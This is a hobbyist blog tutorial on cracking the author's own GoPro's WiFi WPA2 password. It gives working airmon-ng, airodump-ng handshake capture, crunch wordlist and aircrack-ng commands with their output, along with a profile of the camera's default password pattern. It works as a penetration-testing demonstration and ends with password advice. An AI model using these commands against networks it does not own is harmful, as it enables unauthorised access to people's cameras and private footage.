Hacking a GoPro WiFi Access Point

d3adr1nger

Thanos Stantzouris

Posted on December 28, 2020

In this article, I am going to walk you through the entire process of hacking a GoPro Silver 7 (which I own). Why? Why not, I say.
Every hacking adventure is full of practice and fun techniques in action. Every time you try to hack or crack a device you learn something new and gain pure XP (Experience Points) on the matter.

The History behind the Hack

It was a plain classic Friday, and I was on a hacker's high. I just wanted to find something interesting to do. I started gazing around my room when suddenly, out of nowhere, there it was: my GoPro Silver 7, standing alone in exactly the same place it was 4 months ago. It was waiting for me, like a loyal Labrador Retriever... Quite touching... Quite touching indeed... And then the idea hit me! I am gonna hack this shit.
I grab my Wireless Adapter, I fire up my laptop, open up my Kali virtual box, then I grab my phone, start scrolling down Reddit, see a cute puppy, then I get into a conversation about the last season of Silicon Valley. 2 hours passed by like a breeze, and then I remembered.
Wasn't I supposed to be hacking my GoPro? hehe... 😂

So I got back to Work!

TL;DR: I am going to be cracking my GoPro's built-in Wireless Network and find the Password with the help of:

Disclaimer: All the Hacking in this Article took place on devices that I own. Do not hack other people unless you have their WRITTEN Permissions! Ok, that is out of the way now.

1. Reconnaissance

Like it or not, when you embark on a new hacking adventure you always need to scribble down some notes first.
Write down anything you believe may prove useful along the way.

My Notes:

  • GoPro Model: Silver 7
  • GoPro Name: StantzGoPro
  • GoPro Password Type: WPA2
  • GoPro Password: myGoPro123

And then it hit me. My password is weaker than freaking SpongeBob! But why? I always put super complicated passwords that even I do not remember. Why did I commit this Security crime? The answer is simple, boredom, and ignorance. 😁
So I reset the network settings and the new info I got was:

  • GoPro Default Name: GP24514525
  • GoPro Default Password: Zp2-4Vy-cBp

Ok, that's a random password but that dash (-) on the 4th and 8th password slot may not be that random. So I reset the wireless options 29 more times!

The results:

  • GoPro Silver 7 generates a random WPA2 password on every reset: 11 characters of mixed alphanumerics, ALWAYS with dashes in the 4th and 8th slots. @@@-@@@-@@@ ⬅ Like this.
  • The dash NEVER changes position.
  • There was no occurrence of two numbers side by side. (22g) ⬅ This never happened, (63f) ⬅ This never happened, (281) ⬅ This never happened.
  • There was no occurrence of three identical letters side by side. (mmm) ⬅ This never happened.

That is a pretty scary password still, even if you put all the rules in the equation! But where there is a pattern, there is a case.

Did you know that you can rent an Nvidia Tesla K80, a GPU with 4992 cores, from AWS for 0.90$/hour? You can run Hashcat on that thing and try 3 trillion hashes per hour.
Size matters...

But you know what? I know that this Default GoPro password is strong and I still changed it! Do you want to know why? Because I have one camera but many other devices, I want the password to be an easy one to remember as I want to put it on my phone, and on my Laptop, and on my Desktop, and on my Smart Fridge, I don't know.
Imagine having to put Zp2-4Vy-cBp every time. And also! Who would hack my GoPro man? That is so random! So why the strong password? I bet that this was my train of thought back then when I bought it and set it up for the first time.

Ok, I think that's enough Recon for this hack. Let's proceed to network scanning to Find our target.

2. Locking Network Target with Aircrack-ng and grabbing 4-way handshake

That's the cool part of the hacking adventure! Let's fire up the good ol' Kali Linux VM and connect the Wireless Card!
I use this baby for this hack: Tp-Link (TL-WN722N) Wireless Adapter.

When everything is connected run iwconfig on a terminal for a status check.

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off 

If you get this result then everything is all fine and dandy as the British say. (I googled that).

Now the wireless card mode needs to change from managed to monitor. This is a crucial part. I bought this wireless card because I knew that it could work like a champ! But TP-LINK has since updated the hardware versions, and some new TL-WN722N cards don't work, so...

You should buy an Alfa card just to be sure: the Alfa AWUS036NHA High Gain Wireless Adapter.
This one is my favorite because it just works like a charm!

Putting the card to monitor mode

root@kali:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    476 NetworkManager
    941 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       ath9k_htc   Qualcomm Atheros Communications AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

Next step, sniffing out for networks with Airodump-ng

root@kali:~# airodump-ng wlan0mon 

CH 2 ][ Elapsed: 3 mins ][ 2020-11-12 15:51 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 06:41:69:94:C5:8D -26 13      0        0    0   11   65  WPA2 CCMP   PSK  GP24514525 
 **:**:**:**:**:**  -87        2        0    0   1  270   WPA2 CCMP   PSK  C******-**2591               
 **:**:**:**:**:**  -46       13      211    0   2  270   WPA  CCMP   PSK  H*****n                   
 **:**:**:**:**:**  -59        6        0    0   1  130   WPA2 CCMP   PSK  C*****A                     
 **:**:**:**:**:**  -66        7        9    0  11  130   WPA2 CCMP   PSK  *****le*    
 **:**:**:**:**:**  -77        3        1    0   1   65   WPA2 CCMP   PSK  CY*****B                     
 **:**:**:**:**:**  -80        2        0    0   7  270   OPN              CO*******n             
 **:**:**:**:**:**  -80        3        0    0   7  270   WPA2 CCMP   PSK  ******4403001               
 **:**:**:**:**:**  -80        4        0    0   8  130   WPA2 CCMP   PSK  W*****522                
 **:**:**:**:**:**  -78        3        0    0   7  130   WPA2 CCMP   PSK  ****D_BF2EF0                  
 **:**:**:**:**:**  -88        4        0    0  13  130   WPA2 CCMP   PSK  ****CVDW-982

These results represent all the networks that surround my wireless card, and I am only interested in the first one, which represents the Wi-Fi Network of my GoPro.
I put stars on the BSSIDs because the greatest of lads on Reddit noted that people who are good with OSINT techniques can locate people with Wigle.
HOW COOL AND SCARY IS THAT. 🐱‍💻🐱‍👤

If I hadn't reset my GoPro, then under the ESSID column you would see StantzGoPro. A dead giveaway of the kind of device.
A bit of detail here:

  • BSSID: 06:41:69:94:C5:8D
  • CH (channel): 11
  • ENC: WPA2
  • ESSID: GP24514525

You should always write these few details down. They keep finding their way into future commands, like the next one:

airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro

With this command we order our wireless card to listen only to a specific channel and a specific device, and to write everything it captures to files prefixed with Desktop/WPA_Hacks/goPro/goPro.

By doing this we are trying to capture the 4-Way Handshake between a device and the GoPro WiFi.

root@kali:~# airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro 

CH 11 ][ Elapsed: 48 s ][ 2020-11-12 16:00 ][ WPA handshake: 06:41:69:94:C5:8D 

 BSSID              PWR  RXQ  Beacons #Data, #/s  CH  MB  ENC  CIPHER AUTH  ESSID 
 06:41:69:94:C5:8D  -20  36   77      4      0    11  65  WPA2 CCMP   PSK   GP24514525 

 BSSID              STATION            PWR  Rate    Lost  Frames   Notes   Probes 
 06:41:69:94:C5:8D  42:E7:EC:D6:05:DE  -14  1e- 1e  0     5724     EAPOL   GP24514525

To capture a Handshake, a user has to be online and interacting with the camera, which is very likely: if you find a GoPro network somewhere around, it means that someone is either connected or about to connect.
If a GoPro is off, then its Wi-Fi is not broadcasting. Simple as that.

Once you capture the Handshake the only thing that remains is the Handshake cracking!

3. Carving the Dictionary

Now that we have the password hidden and encrypted we need a smart Dictionary to find the Password.
We'll be using the tool Crunch to create a smart Dictionary.

Crunch is a Wordlist generator tool that comes pre-installed with Kali Linux out of the box. Mastering this tool is of the essence when you wish to crack a Hashed Password.
You could always go the Bruteforcing way, but you should leave that technique as a Hail Mary.

Based on what I realized about the GoPro password I could Generate a Wordlist that would most definitely contain the password with this command:

root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt

This command tells crunch to:

  • 11 11: Create strings that are exactly eleven characters long (minimum 11, maximum 11).
  • -t: Specifies a pattern, e.g. @@god@@@@, where only the @'s, ,'s, %'s, and ^'s will change. So everything except the dash ( - ) will change.
  • -d 2@ -d 1%: Limit the number of duplicate characters you allow in the password. E.g., let aa happen but not aaa, and 11 will never happen.
  • -f: Use a charset for the generated password. Because we want the possible characters to be both lowercase and uppercase, and we also want numbers in there, we have to go with mixalpha-numeric.
  • -o: Save the output to wordlist.txt on the Desktop directory.

These parameters with crunch would create a Dictionary containing our target's password. But there is a slight, little, tiny problem...

root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
Crunch will now generate the following amount of data: 162318293407261152 bytes
154798787505 MB
151170690 GB
147627 TB
144 PB
Crunch will now generate the following number of lines: 13526524450605096 

The output would be H U G E. 🤯
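
The arithmetic behind that number, as an added example that is not part of the original article: the Python below counts the @@@-@@@-@@@ keyspace under the rules observed in the Recon step and compares it with crunch's line count. It assumes a dash breaks adjacency between groups and uses the article's own figure of 3 trillion hashes per hour; the function names are illustrative.

```python
from itertools import product
import string

DIGITS = string.digits
CHARSET = string.ascii_letters + DIGITS   # 62 symbols, same size as mixalpha-numeric
CRUNCH_LINES = 13526524450605096          # line count crunch printed above
RATE_PER_HOUR = 3_000_000_000_000         # the article's "3 trillion hashes per hour"

def group_ok(group, no_adjacent_digits):
    """Check one 3-character group (the part between two dashes)."""
    if group[0] == group[1] == group[2]:
        return False                      # never three identical characters in a row
    if no_adjacent_digits:
        for a, b in zip(group, group[1:]):
            if a in DIGITS and b in DIGITS:
                return False              # never two digits side by side
    return True

def groups_allowed(no_adjacent_digits):
    """Enumerate all 62^3 groups and count the ones the rules allow."""
    return sum(group_ok(g, no_adjacent_digits) for g in product(CHARSET, repeat=3))

def keyspace(no_adjacent_digits):
    """XXX-XXX-XXX: three independent groups (assumes a dash breaks adjacency)."""
    return groups_allowed(no_adjacent_digits) ** 3

def hours_to_exhaust(candidates, rate_per_hour=RATE_PER_HOUR):
    return candidates / rate_per_hour

def is_default_format(psk):
    """True if a passphrase has the factory layout and obeys both observed rules."""
    parts = psk.split("-")
    return (len(parts) == 3
            and all(len(p) == 3 and set(p) <= set(CHARSET) for p in parts)
            and all(group_ok(p, True) for p in parts))

if __name__ == "__main__":
    for label, flag in (("three-in-a-row limit only", False), ("both observed rules", True)):
        n = keyspace(flag)
        print(f"{label}: {n:,} candidates, {hours_to_exhaust(n) / 24:,.0f} days")
    print("equals crunch's line count:", keyspace(False) == CRUNCH_LINES)
    print("Zp2-4Vy-cBp is factory format:", is_default_format("Zp2-4Vy-cBp"))
```

Crunch's 13,526,524,450,605,096 lines equal (62^3 - 62)^3, so that count reflects only the three-in-a-row limit. Adding the no-adjacent-digits observation trims the space to about 1.17e16 candidates, roughly 162 days instead of 188 at the article's rate.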

But for the sake of the Proof of Concept (PoC) let's demonstrate the Dictionary attack.

Note to the future: If you are watching this in 2030, 144 PB was a lot of Data back in the Covid Crisis! So Good for you! You can crack WPA2 passwords easily! Congrats 🎉🥂

If we go through with Crunch we would eventually have a list like the following in our hands.

zp2-4vy-cBp
2r6-cnj-Xky 
w4f-ceb-DC2 
gbs-24d-cas 
23H-wec-dv3 
P6C-PRt-hrK 
Yn9-Cr6-Ybm 
s5p-WWN-6n2 
HSM-v4Q-khn 
CCW-VkJ-FuJ 
Pub-bMw-chn 
9vm-WJN-Vf3 
9vm-wjn-Vf3 
9vm-wJn-Vf3 
9vm-wjN-Vf3 
9vm-wJN-Vf3 
9vm-Wjn-Vf3 
wrj-hD5-4hZ 
k6Z-wjz-mtS 
3nk-Ncj-cf9 
Rnk-PRt-h1k

Let's use this Dictionary to prove a point.

The Dictionary attack

The Aircrack-ng command for the attack and the results are:

root@kali:~# aircrack-ng Desktop/WPA_Hacks/goPro/goPro-01.cap -w Desktop/gopro.txt
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.

   #  BSSID              ESSID                     Encryption

   1  06:41:69:94:C5:8D  GP24514525                WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.

1 potential targets



                               Aircrack-ng 1.6 

      [00:00:00] 19/21 keys tested (940.87 k/s) 

      Time left: 0 seconds                                      90.48%

                          KEY FOUND! [ 9vm-WJN-Vf3 ]


      Master Key     : DD 1D A3 87 9C D5 DF A5 A9 77 D5 EC 35 D4 C6 C3 
                       03 1D F9 4E 6E 03 90 92 41 40 BA 4E FE 2A 92 72 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : C1 BF EF A3 22 02 9F 4B 19 4C 1B 9C B6 0D EA 1A 

Dope feeling man. Dope the least.

4. Bonus! Wordlist Creation

Ok, everything went perfectly thus far. But what would have happened if instead of GP24514525 the name was StantzGoPro?
That takes us to an entirely different way of approaching this Dictionary thing.
What I am thinking is: "Since he has changed the name, there is NO way in hell that he left that ugly password as default. NO way!"

Here is a thought: he didn't entirely change the name. He kept the word "GoPro" inside, so he may use it again in his password. GoPro is 5 letters, and an acceptable WPA2 password needs at least 8 characters. Good.

Let's build a cool Dictionary to hack StantzGoPro

Simple Wordlist:

crunch 14 14 -t StantzGoPro%%% -o goPro-simple-wl.txt

This command will create a list starting at StantzGoPro000 and finishing at StantzGoPro999.

Pretty simple, but powerful if you work with it more. As I said earlier, Crunch is a must. Password cracking is not easy, but is Hacking easy? 🤓

Conclusion

Cracking a GoPro password is totally possible, and you can probably understand the danger and how it can expose all the images and 4k videos stored in the camera to people with malicious intent. Keep your Passwords strong. And store them in a password manager like LastPass. It will make your life easier and hackers' lives a lot more difficult.
Password cracking is an art, it needs attention to detail, a critical way of thinking, and most definitely some good, old fashioned trial and error sprinkled with some dazzling patience.

There are many roads to take and many more books to read. I created this Article - Tutorial - PoC or however you like to call it just to give out something new to the community. I will create a more in-depth article about password cracking and much more real-life hacking PoCs like this one including Phishing, more Wi-Fi hacking, and pretty much whatever spikes my interest at that point. If what you just read feels a bit... advanced, you should also take a look at my other articles on my blog Sudorealm:
